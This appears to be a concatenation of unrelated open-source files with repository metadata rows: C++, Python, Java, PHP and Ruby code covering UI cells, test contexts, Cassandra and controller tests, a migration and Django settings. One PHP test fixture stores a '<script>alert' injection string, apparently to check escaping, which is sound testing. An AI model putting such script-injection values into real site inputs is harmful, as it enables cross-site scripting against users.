** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
** SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
** WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
** OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**
**********************************************************************************************************************/
#include "Cell.h"
namespace OOInteraction {
// Delegating constructors: a cell defaults to row 0 and a 1x1 grid span.
Cell::Cell(int x, Visualization::Item* item, int stringComponentsStart, int stringComponentsEnd)
: Cell(x, 0, 1, 1, item, stringComponentsStart, stringComponentsEnd)
{}

Cell::Cell(int x, int y, Visualization::Item* item, int stringComponentsStart, int stringComponentsEnd)
: Cell(x, y, 1, 1, item, stringComponentsStart, stringComponentsEnd)
{}

Cell::Cell(int x, int y, int width, int height, Visualization::Item* item, int stringComponentsStart,
		int stringComponentsEnd)
: region_(x, y, width, height), item_(item), stringComponentsStart_(stringComponentsStart),
  // A negative end index means the cell covers only the start component.
  stringComponentsEnd_(stringComponentsEnd < 0 ? stringComponentsStart : stringComponentsEnd)
{
}

Cell::~Cell()
{
}
// Returns the caret offset within this cell's item for the given key press.
// The combined length of the cell's string components is written to |length|
// (when provided) and passed to the item-offset computation.
int Cell::offset(const QStringList& allComponents, Qt::Key key, int* length)
{
	// Sum the lengths of all string components belonging to this cell.
	int l = 0;
	for (int i = stringComponentsStart(); i <= stringComponentsEnd(); ++i)
		l += allComponents[i].length();

	if (length) *length = l;
	return StringOffsetProvider::itemOffset(item(), l, key);
}

void Cell::setOffset(int newOffset)
{
	StringOffsetProvider::setOffsetInItem(newOffset, item());
}
} /* namespace OOInteraction */
| patrick-luethi/Envision | OOInteraction/src/string_offset_providers/Cell.cpp | C++ | bsd-3-clause | 2,984 |
# Copyright (c) 2015, National Documentation Centre (EKT, www.ekt.gr)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# Neither the name of the National Documentation Centre nor the
# names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
__author__ = 'kutsurak'
class RundeckException(Exception):
    """Base exception for errors raised by the pyrundeck client.

    Behaves exactly like ``Exception``; it exists so that callers can
    catch Rundeck-specific failures separately from other errors.
    """

    def __init__(self, *args, **kwargs):
        # Forward everything to Exception unchanged.
        super(RundeckException, self).__init__(*args, **kwargs)
| EKT/pyrundeck | pyrundeck/exceptions.py | Python | bsd-3-clause | 1,781 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2015-2018 by ExopyPulses Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Sequence context used for testing.
"""
from atom.api import Float, set_default
from exopy_pulses.pulses.contexts.base_context import BaseContext
class DummyContext(BaseContext):
    """Context limited to testing purposes.

    Exposes two logical and two analogical channels and a configurable
    sampling time, so pulse sequences can be compiled without hardware.
    """
    # Names of the logical (digital) channels this context provides.
    logical_channels = set_default(('Ch1_L', 'Ch2_L'))
    # Names of the analogical (analog) channels this context provides.
    analogical_channels = set_default(('Ch1_A', 'Ch2_A'))
    # Sampling time used when evaluating sequences (units per BaseContext).
    sampling = Float(1.0)

    def compile_and_transfer_sequence(self, sequence, driver=None):
        """Simply evaluate and simplify the underlying sequence.

        Returns a ``(success, infos, errors)`` tuple mirroring the real
        contexts' contract; nothing is transferred anywhere.
        """
        items, errors = self.preprocess_sequence(sequence)
        if not items:
            # Evaluation failed: report the collected errors.
            return False, {}, errors
        return True, {'test': True}, {}

    def list_sequence_infos(self):
        """Return the static infos dict advertised by this dummy context."""
        return {'test': False}

    def _get_sampling_time(self):
        # Getter backing the sampling time; simply exposes ``sampling``.
        return self.sampling
| Ecpy/ecpy_pulses | exopy_pulses/testing/context.py | Python | bsd-3-clause | 1,203 |
package uk.sky.cqlmigrate;
import com.datastax.oss.driver.api.core.ConsistencyLevel;
import com.datastax.oss.simulacron.common.cluster.ClusterSpec;
import com.datastax.oss.simulacron.common.cluster.DataCenterSpec;
import com.datastax.oss.simulacron.common.cluster.QueryLog;
import com.datastax.oss.simulacron.common.cluster.RequestPrime;
import com.datastax.oss.simulacron.common.request.Query;
import com.datastax.oss.simulacron.common.result.SuccessResult;
import com.datastax.oss.simulacron.common.stubbing.Prime;
import com.datastax.oss.simulacron.common.stubbing.PrimeDsl;
import com.datastax.oss.simulacron.server.BoundCluster;
import com.datastax.oss.simulacron.server.Server;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.Lists;
import org.apache.cassandra.exceptions.ConfigurationException;
import org.junit.*;
import uk.sky.cqlmigrate.util.PortScavenger;
import java.net.Inet4Address;
import java.net.InetSocketAddress;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.*;
import java.util.stream.Collectors;
import static com.datastax.oss.simulacron.common.stubbing.PrimeDsl.*;
import static java.lang.String.valueOf;
import static java.util.Arrays.asList;
import static org.assertj.core.api.Assertions.assertThat;
/**
 * Integration test verifying that {@code CqlMigrator} executes its underlying
 * CQL statements at the expected read and write consistency levels. A
 * Simulacron-simulated single-node Cassandra cluster is used instead of a real
 * one; queries are "primed" with canned responses and the recorded query logs
 * are inspected afterwards.
 */
public class CqlMigratorConsistencyLevelIntegrationTest {
    private static final String CLIENT_ID = UUID.randomUUID().toString();
    // Free port scavenged at class-load time for the simulated node.
    private static final int defaultStartingPort = PortScavenger.getFreePort();
    private static final Server server = Server.builder().build();
    private static final ClusterSpec clusterSpec = ClusterSpec.builder().build();
    private static final String username = "cassandra";
    private static final String password = "cassandra";
    private static final String TEST_KEYSPACE = "cqlmigrate_test";
    private static final String LOCAL_DC = "DC1";
    // CQL script directories applied during a migration run.
    private Collection<Path> cqlPaths;
    private static BoundCluster cluster;
    private final CassandraLockConfig lockConfig = CassandraLockConfig.builder().build();

    /** Boots a one-node simulated DC1 cluster shared by every test. */
    @BeforeClass
    public static void classSetup() throws UnknownHostException {
        DataCenterSpec dc = clusterSpec.addDataCenter().withName("DC1").withCassandraVersion("3.11").build();
        dc.addNode()
            .withAddress(new InetSocketAddress(Inet4Address.getByAddress(new byte[]{127, 0, 0, 1}), defaultStartingPort))
            .withPeerInfo("host_id", UUID.randomUUID())
            .build();
        cluster = server.register(clusterSpec);
        cluster.prime(when("select cluster_name from system.local where key = 'local'")
            .then(rows().row("cluster_name", "0").build()));
    }

    /** Resets primes/logs and re-primes the keyspace and lock table before each test. */
    @Before
    public void baseSetup() throws Exception {
        cluster.clearPrimes(true);
        cluster.clearLogs();
        setupKeyspace(TEST_KEYSPACE);
        initialiseLockTable();
    }

    /** Tears down the simulated cluster once all tests have run. */
    @AfterClass
    public static void destroy() {
        cluster.close();
        server.close();
    }

    /**
     * Primes the lock acquire/release queries so the migrator can take and
     * release its schema-migration lock against the simulated cluster.
     */
    public void initialiseLockTable() throws ConfigurationException, URISyntaxException {
        cqlPaths = asList(getResourcePath("cql_bootstrap"), getResourcePath("cql_consistency_level"));
        cluster.prime(when("select cluster_name from system.local where key = 'local'")
            .then(rows().row("cluster_name", "0").build()));
        cluster.prime(primeInsertQuery(TEST_KEYSPACE, lockConfig.getClientId(), true));
        cluster.prime(primeDeleteQuery(TEST_KEYSPACE, lockConfig.getClientId(), true, UUID.randomUUID().toString()));
    }

    /** Resolves a classpath resource directory to a filesystem path. */
    private Path getResourcePath(String resourcePath) throws URISyntaxException {
        return Paths.get(ClassLoader.getSystemResource(resourcePath).toURI());
    }

    @Test
    public void shouldApplyCorrectDefaultConsistencyLevelsConfiguredForUnderlyingQueries() throws Exception {
        //arrange
        // Defaults expected when no consistency levels are configured explicitly.
        ConsistencyLevel expectedDefaultReadConsistencyLevel = ConsistencyLevel.LOCAL_ONE;
        ConsistencyLevel expectedDefaultWriteConsistencyLevel = ConsistencyLevel.ALL;
        CqlMigrator migrator = CqlMigratorFactory.create(lockConfig);
        //act
        executeMigration(migrator, cqlPaths);
        //assert
        assertStatementsExecuteWithExpectedConsistencyLevels(expectedDefaultReadConsistencyLevel, expectedDefaultWriteConsistencyLevel);
    }

    /** Runs a migration against the simulated node on localhost. */
    private void executeMigration(CqlMigrator migrator, Collection<Path> cqlPaths) {
        String[] hosts = new String[]{"localhost"};
        migrator.migrate(hosts, LOCAL_DC, defaultStartingPort, username, password, TEST_KEYSPACE, cqlPaths);
    }

    @Test
    public void shouldApplyCorrectCustomisedConsistencyLevelsConfiguredForUnderlyingQueries() throws Exception {
        //arrange
        // Explicitly configured levels must override the defaults.
        ConsistencyLevel expectedReadConsistencyLevel = ConsistencyLevel.LOCAL_QUORUM;
        ConsistencyLevel expectedWriteConsistencyLevel = ConsistencyLevel.EACH_QUORUM;
        CqlMigrator migrator = CqlMigratorFactory.create(CqlMigratorConfig.builder()
            .withLockConfig(lockConfig)
            .withReadConsistencyLevel(expectedReadConsistencyLevel)
            .withWriteConsistencyLevel(expectedWriteConsistencyLevel)
            .build()
        );
        //act
        executeMigration(migrator, cqlPaths);
        //assert
        assertStatementsExecuteWithExpectedConsistencyLevels(expectedReadConsistencyLevel, expectedWriteConsistencyLevel);
    }

    /** Converts a driver-side consistency level into Simulacron's enum. */
    private static com.datastax.oss.simulacron.common.codec.ConsistencyLevel toSimulacronConsistencyLevel(ConsistencyLevel driverConsistencyLevel) {
        return com.datastax.oss.simulacron.common.codec.ConsistencyLevel.fromString(driverConsistencyLevel.toString());
    }

    /**
     * Inspects the simulated cluster's query logs and asserts that each class
     * of statement (schema DDL, schema_updates reads/writes, USE keyspace) was
     * executed at the expected consistency level.
     */
    private void assertStatementsExecuteWithExpectedConsistencyLevels(ConsistencyLevel expectedReadConsistencyLevel, ConsistencyLevel expectedWriteConsistencyLevel) {
        //bootstrap.cql is already "applied" as we are priming cassandra to pretend it already has the keyspace
        //ensure that schema updates are applied at configured consistency level
        List<QueryLog> queryLogs = cluster.getLogs().getQueryLogs().stream()
            .filter(queryLog -> queryLog.getFrame().message.toString().contains("CREATE TABLE consistency_test (column1 text primary key, column2 text)"))
            .filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedWriteConsistencyLevel)))
            .collect(Collectors.toList());
        assertThat(queryLogs.size()).isEqualTo(1);
        // ensure that any reads from schema updates are read at the configured consistency level
        queryLogs = cluster.getLogs().getQueryLogs().stream()
            .filter(queryLog -> queryLog.getFrame().message.toString().contains("SELECT * FROM cqlmigrate_test.schema_updates where filename = ?"))
            .filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedReadConsistencyLevel)))
            .collect(Collectors.toList());
        assertThat(queryLogs.size()).isEqualTo(1);
        //ensure that any inserts into schema updates are done at the configured consistency level
        queryLogs = cluster.getLogs().getQueryLogs().stream()
            .filter(queryLog -> queryLog.getFrame().message.toString().contains("INSERT INTO schema_updates (filename, checksum, applied_on) VALUES (?, ?, dateof(now()));"))
            .filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedWriteConsistencyLevel)))
            .collect(Collectors.toList());
        assertThat(queryLogs.size()).isEqualTo(1);
        //ensure that use keyspace is done at the configured consistency level
        queryLogs = cluster.getLogs().getQueryLogs().stream()
            .filter(queryLog -> queryLog.getFrame().message.toString().contains("USE cqlmigrate_test;"))
            .filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedReadConsistencyLevel)))
            .collect(Collectors.toList());
        assertThat(queryLogs.size()).isGreaterThanOrEqualTo(1);
        //ensure that create schema_updates table is done at the configured consistency level
        queryLogs = cluster.getLogs().getQueryLogs().stream()
            .filter(queryLog -> queryLog.getFrame().message.toString().contains("CREATE TABLE schema_updates (filename text primary key, checksum text, applied_on timestamp);"))
            .filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedWriteConsistencyLevel)))
            .collect(Collectors.toList());
        assertThat(queryLogs.size()).isEqualTo(1);
    }

    /**
     * Builds a prime for the lock-acquisition LWT insert, answering with
     * {@code [applied]} set to {@code lockApplied}.
     */
    private static PrimeDsl.PrimeBuilder primeInsertQuery(String lockName, String clientId, boolean lockApplied) {
        String prepareInsertQuery = "INSERT INTO cqlmigrate.locks (name, client) VALUES (?, ?) IF NOT EXISTS";
        PrimeDsl.PrimeBuilder primeBuilder = when(query(
            prepareInsertQuery,
            Lists.newArrayList(
                com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ONE,
                com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ALL),
            new LinkedHashMap<>(ImmutableMap.of("name", lockName + ".schema_migration", "client", clientId)),
            new LinkedHashMap<>(ImmutableMap.of("name", "varchar", "client", "varchar"))))
            .then(rows().row(
                "[applied]", valueOf(lockApplied), "client", CLIENT_ID).columnTypes("[applied]", "boolean", "clientid", "varchar")
            );
        return primeBuilder;
    }

    /**
     * Builds a prime for the lock-release LWT delete, answering with
     * {@code [applied]} set to {@code lockApplied} and the holding client id.
     */
    private static PrimeDsl.PrimeBuilder primeDeleteQuery(String lockName, String clientId, boolean lockApplied, String lockHoldingClient) {
        String deleteQuery = "DELETE FROM cqlmigrate.locks WHERE name = ? IF client = ?";
        PrimeDsl.PrimeBuilder primeBuilder = when(query(
            deleteQuery,
            Lists.newArrayList(
                com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ONE,
                com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ALL),
            new LinkedHashMap<>(ImmutableMap.of("name", lockName + ".schema_migration", "client", clientId)),
            new LinkedHashMap<>(ImmutableMap.of("name", "varchar", "client", "varchar"))))
            .then(rows()
                .row("[applied]", valueOf(lockApplied), "client", lockHoldingClient).columnTypes("[applied]", "boolean", "clientid", "varchar"));
        return primeBuilder;
    }

    /**
     * Primes the system_schema keyspace queries so the driver believes
     * {@code keyspaceName} already exists on the simulated cluster.
     */
    private void setupKeyspace(String keyspaceName) {
        BoundCluster simulacron = cluster;
        Map<String, String> keyspaceColumns = ImmutableMap.of(
            "keyspace_name", "varchar",
            "durable_writes", "boolean",
            "replication", "map<varchar, varchar>");
        List<LinkedHashMap<String, Object>> allKeyspacesRows = new ArrayList<>();
        LinkedHashMap<String, Object> keyspaceRow = new LinkedHashMap<>();
        keyspaceRow.put("keyspace_name", keyspaceName);
        keyspaceRow.put("durable_writes", true);
        keyspaceRow.put(
            "replication",
            ImmutableMap.of(
                "class", "org.apache.cassandra.locator.SimpleStrategy", "replication_factor", "1"));
        allKeyspacesRows.add(keyspaceRow);
        // prime the query the driver issues when fetching a single keyspace
        Query whenSelectKeyspace =
            new Query("SELECT * FROM system_schema.keyspaces WHERE keyspace_name = '" + keyspaceName + '\'');
        SuccessResult thenReturnKeyspace =
            new SuccessResult(Collections.singletonList(new LinkedHashMap<>(keyspaceRow)), new LinkedHashMap<>(keyspaceColumns));
        RequestPrime primeKeyspace = new RequestPrime(whenSelectKeyspace, thenReturnKeyspace);
        simulacron.prime(new Prime(primeKeyspace));
        // prime the query the driver issues when fetching all keyspaces
        Query whenSelectAllKeyspaces = new Query("SELECT * FROM system_schema.keyspaces");
        SuccessResult thenReturnAllKeyspaces = new SuccessResult(allKeyspacesRows, new LinkedHashMap<>(keyspaceColumns));
        RequestPrime primeAllKeyspaces =
            new RequestPrime(whenSelectAllKeyspaces, thenReturnAllKeyspaces);
        simulacron.prime(new Prime(primeAllKeyspaces));
    }
}
| sky-uk/cqlmigrate | src/test/java/uk/sky/cqlmigrate/CqlMigratorConsistencyLevelIntegrationTest.java | Java | bsd-3-clause | 12,518 |
<?php
use Core\Test\ControllerTestCase;
use Application\Controller\IndexController;
use Application\Model\Chamado;
use Zend\Http\Request;
use Zend\Stdlib\Parameters;
use Zend\View\Renderer\PhpRenderer;
/**
* @group Controller
*/
/**
 * Controller test for Application\Controller\IndexController.
 *
 * Verifies 404 handling for unknown actions and that the index action
 * lists the persisted "chamados" (tickets).
 */
class IndexControllerTest extends ControllerTestCase
{
    /**
     * Fully qualified class name of the controller under test.
     * @var string
     */
    protected $controllerFQDN = 'Application\Controller\IndexController';

    /**
     * Route name; usually the module name.
     * @var string
     */
    protected $controllerRoute = 'application';

    /**
     * Dispatching a non-existent action must yield a 404 response.
     */
    public function test404()
    {
        $this->routeMatch->setParam('action', 'action_nao_existente');
        $result = $this->controller->dispatch($this->request);
        $response = $this->controller->getResponse();
        $this->assertEquals(404, $response->getStatusCode());
    }

    /**
     * The index page must render a ViewModel exposing the stored tickets.
     */
    public function testIndexAction()
    {
        // Persist two tickets so the listing has known content
        $chamadoA = $this->addChamado();
        $chamadoB = $this->addChamado();
        // Dispatch the index route
        $this->routeMatch->setParam('action', 'index');
        $result = $this->controller->dispatch($this->request, $this->response);
        // Check the HTTP response
        $response = $this->controller->getResponse();
        $this->assertEquals(200, $response->getStatusCode());
        // A ViewModel must have been returned
        $this->assertInstanceOf('Zend\View\Model\ViewModel', $result);
        // The view data must carry the tickets
        $variables = $result->getVariables();
        $this->assertArrayHasKey('chamados', $variables);
        // Compare the persisted data with what the controller exposed
        $controllerData = $variables["chamados"];
        $this->assertEquals($chamadoA->chamado_cobra, $controllerData[0]['chamado_cobra']);
        $this->assertEquals($chamadoB->chamado_cobra, $controllerData[1]['chamado_cobra']);
    }

    /**
     * Disabled: index page pagination test, kept for when the controller
     * paginates its listing again.
     */
    /*public function testIndexActionPaginator()
    {
        // Cria chamados para testar
        $chamado = array();
        for($i=0; $i< 25; $i++) {
            $chamado[] = $this->addChamado();
        }
        // Invoca a rota index
        $this->routeMatch->setParam('action', 'index');
        $result = $this->controller->dispatch($this->request, $this->response);
        // Verifica o response
        $response = $this->controller->getResponse();
        $this->assertEquals(200, $response->getStatusCode());
        // Testa se um ViewModel foi retornado
        $this->assertInstanceOf('Zend\View\Model\ViewModel', $result);
        // Testa os dados da view
        $variables = $result->getVariables();
        $this->assertArrayHasKey('chamados', $variables);
        //testa o paginator
        $paginator = $variables["chamados"];
        $this->assertEquals('Zend\Paginator\Paginator', get_class($paginator));
        $chamados = $paginator->getCurrentItems()->toArray();
        $this->assertEquals(10, count($chamados));
        $this->assertEquals($chamado[0]->id, $chamados[0]['id']);
        $this->assertEquals($chamado[1]->id, $chamados[1]['id']);
        //testa a terceira página da paginação
        $this->routeMatch->setParam('action', 'index');
        $this->routeMatch->setParam('page', 3);
        $result = $this->controller->dispatch($this->request, $this->response);
        $variables = $result->getVariables();
        $controllerData = $variables["chamados"]->getCurrentItems()->toArray();
        $this->assertEquals(5, count($controllerData));
    }*/

    /**
     * Creates and persists a ticket fixture for the tests.
     * The dependencia value deliberately contains markup to exercise escaping.
     */
    private function addChamado()
    {
        $chamado = new Chamado();
        $chamado->numero = '12345678901234';
        $chamado->chamado_cobra = '123456789012345';
        $chamado->dependencia = 'Matriz I <script>alert("ok");</script><br>';
        $chamado->dtachamado = date('Y-m-d H:i:s');
        $chamado->dtalimite = date('Y-m-d H:i:s');
        $chamado->status = '12345678901234567890';
        $chamado->tecnico_alocado = 'Antonio';
        $chamado->agencia = '1234';
        $chamado->nrocontrato = '1234567890123';
        $chamado->grupo = 'TAA';
        $chamado->observacao = 'Teste OBS';
        $saved = $this->getTable('Application\Model\Chamado')->save($chamado);
        return $chamado;
    }
}
require 'save_without_timestamping'
# Redeclared locally because the Asset model may no longer exist in the
# application by the time this migration is (re)run.
class Asset < ActiveRecord::Base
  belongs_to :resource, :polymorphic => true
end
# Copies policy_id/project_id from each Asset record onto its polymorphic
# resource (and, for versioned resources, onto every version), without
# touching timestamps. `down` clears the same fields again.
class TransferAssetDataToResources < ActiveRecord::Migration
  # Resource classes that keep version records needing the same fields.
  VERSIONED_CLASSES = %w[DataFile Model Protocol].freeze

  def self.up
    count = 0
    Asset.all.each do |asset|
      resource = asset.resource
      resource.policy_id  = asset.policy_id
      resource.project_id = asset.project_id
      count += 1 if resource.save_without_timestamping
      next unless VERSIONED_CLASSES.include?(resource.class.name)
      # Keep each version in step with its parent resource.
      resource.versions.each do |version|
        version.policy_id  = asset.policy_id
        version.project_id = asset.project_id
        version.save_without_timestamping
      end
    end
    puts "#{count}/#{Asset.count} asset resources updated."
  end

  def self.down
    count = 0
    Asset.all.each do |asset|
      resource = asset.resource
      resource.policy_id  = nil
      resource.project_id = nil
      # Versions are cleared before the parent resource is saved,
      # mirroring the original ordering.
      if VERSIONED_CLASSES.include?(resource.class.name)
        resource.versions.each do |version|
          version.policy_id  = nil
          version.project_id = nil
          version.save_without_timestamping
        end
      end
      count += 1 if resource.save_without_timestamping
    end
    puts "#{count}/#{Asset.count} asset resources reverted."
  end
end
| njall/wel-seek | db/migrate/archive/20100708073047_transfer_asset_data_to_resources.rb | Ruby | bsd-3-clause | 1,406 |
__author__ = 'Thomas Rueckstiess, ruecksti@in.tum.de'
from agent import Agent
from pybrain.datasets import ReinforcementDataSet
class HistoryAgent(Agent):
    """ This agent stores actions, states, and rewards encountered during interaction with an environment
        in a ReinforcementDataSet (which is a variation of SequentialDataSet). The stored history can
        be used for learning and is erased by resetting the agent. It also makes sure that integrateObservation,
        getAction and giveReward are called in exactly that order. """

    def __init__(self, indim, outdim):
        """ :key indim: dimensionality of the observations
            :key outdim: dimensionality of the actions """
        # store input and output dimension
        self.indim = indim
        self.outdim = outdim
        # create history dataset; logging is on unless disableHistory() is called
        self.remember = True
        self.history = ReinforcementDataSet(indim, outdim)
        # temporaries holding the pending observation/action of the current step
        self.lastobs = None
        self.lastaction = None

    def integrateObservation(self, obs):
        """ 1. stores the observation received in a temporary variable until action is called and
            reward is given. """
        # Identity checks ('is None') instead of '== None': observations are
        # typically numpy arrays, for which '==' broadcasts element-wise and
        # does not produce a single boolean suitable for assert.
        assert self.lastobs is None
        assert self.lastaction is None
        self.lastobs = obs

    def getAction(self):
        """ 2. stores the action in a temporary variable until reward is given. """
        assert self.lastobs is not None
        assert self.lastaction is None
        # implement getAction in subclass and set self.lastaction

    def enableHistory(self):
        """ turn on logging of interactions into the history dataset. """
        self.remember = True

    def disableHistory(self):
        """ turn off logging of interactions. """
        self.remember = False

    def giveReward(self, r):
        """ 3. stores observation, action and reward in the history dataset. """
        # step 3: assume that state and action have been set
        assert self.lastobs is not None
        assert self.lastaction is not None
        # store state, action and reward in dataset
        if self.remember:
            self.history.addSample(self.lastobs, self.lastaction, r)
        self.lastobs = None
        self.lastaction = None

    def reset(self):
        """ clears the history of the agent. """
        self.history.clear()
| daanwierstra/pybrain | pybrain/rl/agents/history.py | Python | bsd-3-clause | 2,202 |
# Minimal Django settings module used when running the test suite.

# File-backed SQLite database created alongside the test run.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'test.sqlite',
    }
}

# Only the app under test needs to be installed.
INSTALLED_APPS = [
    'nocaptcha_recaptcha',
]

# Middleware stack for the tests; ordering is significant to Django.
MIDDLEWARE_CLASSES = [
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.doc.XViewMiddleware',
    'django.middleware.common.CommonMiddleware',
]

# Dummy reCAPTCHA keys -- tests never hit the real service.
NORECAPTCHA_SECRET_KEY = 'privkey'
NORECAPTCHA_SITE_KEY = 'pubkey'
| ImaginaryLandscape/django-nocaptcha-recaptcha | test_settings.py | Python | bsd-3-clause | 636 |
# -*- coding: utf-8 -*-
"""Test forms."""
from personal_website.article.forms import ArticleForm
from personal_website.public.forms import LoginForm
class TestArticleForm:
    """Validation tests for ArticleForm."""

    def test_title_required(self, article):
        """A form without a title fails validation with a title error."""
        # NOTE(review): ``article`` is presumably a pytest fixture providing
        # an unsaved Article instance -- confirm against conftest.py.
        form = ArticleForm(body=article.body, published=article.published)
        assert form.validate() is False
        assert 'title - This field is required.' in form.title.errors

    def test_validate_title_exists(self, article):
        """A title already used by a published article is rejected."""
        article.published = True
        article.save()
        form = ArticleForm(title=article.title, body=article.body, published=True)
        assert form.validate() is False
        assert 'Title already Used' in form.title.errors

    def test_validate_slug_exists(self, article):
        """A title whose derived slug collides yields a URL error."""
        article.published = True
        article.save()
        form = ArticleForm(title=article.title, body=article.body, published=True)
        assert form.validate() is False
        assert 'Error producing url. Try a different title.' in form.title.errors
class TestLoginForm:
    """Validation tests for LoginForm."""

    def test_validate_success(self, user):
        """Valid credentials validate and expose the matched user."""
        user.set_password('example')
        user.save()
        form = LoginForm(username=user.username, password='example')
        assert form.validate() is True
        assert form.user == user

    def test_validate_unknown_username(self, db):
        """An unknown username fails with a username error and no user."""
        form = LoginForm(username='unknown', password='example')
        assert form.validate() is False
        assert 'Unknown username' in form.username.errors
        assert form.user is None

    def test_validate_invalid_password(self, user):
        """A wrong password fails with a password error."""
        user.set_password('example')
        user.save()
        form = LoginForm(username=user.username, password='wrongpassword')
        assert form.validate() is False
        assert 'Invalid password' in form.password.errors

    def test_validate_inactive_user(self, user):
        """Correct credentials still fail when the account is inactive."""
        user.active = False
        user.set_password('example')
        user.save()
        # Correct username and password, but user is not activated
        form = LoginForm(username=user.username, password='example')
        assert form.validate() is False
        assert 'User not activated' in form.username.errors
| arewellborn/Personal-Website | tests/test_forms.py | Python | bsd-3-clause | 2,446 |
from django.contrib import admin
import models
# Register every djpandora model with the default admin site so they can
# be managed through the Django admin. Registration order matches the
# original one-call-per-model form.
for _model in (models.Song, models.Station, models.Vote,
               models.StationPoll, models.StationVote):
    admin.site.register(_model)
/**
*============================================================================
* Copyright The Ohio State University Research Foundation, The University of Chicago -
* Argonne National Laboratory, Emory University, SemanticBits LLC, and
* Ekagra Software Technologies Ltd.
*
* Distributed under the OSI-approved BSD 3-Clause License.
* See http://ncip.github.com/cagrid-core/LICENSE.txt for details.
*============================================================================
**/
package gov.nih.nci.cagrid.data.utilities.validation;
import gov.nih.nci.cagrid.common.Utils;
import java.net.URI;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import javax.wsdl.Definition;
import javax.wsdl.Import;
import javax.wsdl.Types;
import javax.wsdl.WSDLException;
import javax.wsdl.extensions.ExtensibilityElement;
import javax.wsdl.extensions.UnknownExtensibilityElement;
import javax.wsdl.factory.WSDLFactory;
import javax.wsdl.xml.WSDLReader;
import javax.xml.namespace.QName;
import org.apache.axis.message.addressing.EndpointReferenceType;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.jdom.input.DOMBuilder;
import org.w3c.dom.Element;
/**
* @author oster
*/
/**
 * Utility helpers for parsing WSDL documents, walking their import graphs
 * to collect inline {@code <types>} schemas, and resolving the location of
 * an imported schema namespace.
 *
 * @author oster
 */
public class WSDLUtils {
    protected static Log LOG = LogFactory.getLog(WSDLUtils.class.getName());

    /**
     * Parses the WSDL at the given location, following imported documents.
     *
     * @param wsdlLocation URI/path of the WSDL document
     * @return the parsed top-level Definition
     * @throws WSDLException if the document cannot be read or parsed
     */
    public static Definition parseServiceWSDL(String wsdlLocation) throws WSDLException {
        WSDLFactory factory = WSDLFactory.newInstance();
        WSDLReader wsdlReader = factory.newWSDLReader();
        // verbose output only when debug logging is on
        wsdlReader.setFeature("javax.wsdl.verbose", LOG.isDebugEnabled());
        wsdlReader.setFeature("javax.wsdl.importDocuments", true);
        Definition mainDefinition = wsdlReader.readWSDL(wsdlLocation);
        return mainDefinition;
    }

    /**
     * Derives the conventional "?wsdl" URL from a service endpoint reference.
     */
    public static String getWSDLLocation(EndpointReferenceType epr) {
        return epr.getAddress().toString() + "?wsdl";
    }

    /**
     * Recursively walks the WSDL definition and its imports, collecting each
     * document's inline types schema into {@code schemas}, keyed by the
     * document's base URI.
     *
     * @param mainDefinition definition to start from
     * @param schemas out-parameter map of document base URI to schema element
     */
    public static void walkWSDLFindingSchema(Definition mainDefinition, Map<String, org.jdom.Element> schemas) {
        LOG.debug("Looking at WSDL at:" + mainDefinition.getDocumentBaseURI());
        org.jdom.Element schema = extractTypesSchema(mainDefinition);
        if (schema != null) {
            LOG.debug("Found types schema.");
            schemas.put(mainDefinition.getDocumentBaseURI(), schema);
        } else {
            LOG.debug("No types schema found.");
        }
